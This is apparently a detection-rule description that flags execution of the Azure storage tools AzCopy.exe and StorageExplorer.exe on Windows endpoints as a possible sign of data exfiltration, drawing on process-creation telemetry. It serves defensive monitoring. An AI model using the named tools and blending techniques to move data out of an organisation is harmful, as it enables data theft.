Detects Windows endpoint activity where Azure Storage utilities (AzCopy.exe and StorageExplorer.exe) are executed from the command line. These tools enable large-scale data transfers to and from Azure Storage, allowing legitimate admin use but also providing a conduit for data exfiltration that can blend with normal traffic. The analytic relies on endpoint telemetry from EDR and OS logs (e.g., Sysmon Event ID 1, Windows Security log 4688 process creation, and CrowdStrike ProcessRollup2) to surface cases where a process named AzCopy.exe or StorageExplorer.exe is spawned. The rule collects contextual attributes such as vendor_product, user, parent_process and path, as well as command-line arguments, to help distinguish legitimate operations from suspicious activity. It emphasizes complete command lines and proper mapping to the Endpoint data model (Processes) and CIM normalization to facilitate correlation with other detections. The detection should be treated as anomalous and investigated when paired with unusual parent-child process relationships, unexpected users, or atypical command-line patterns that indicate staging, copying, or exfiltrating data to cloud storage. The alert's aim is to identify potential compromise and data loss while reducing false positives by focusing on process-level indicators of storage tooling, rather than network indicators alone.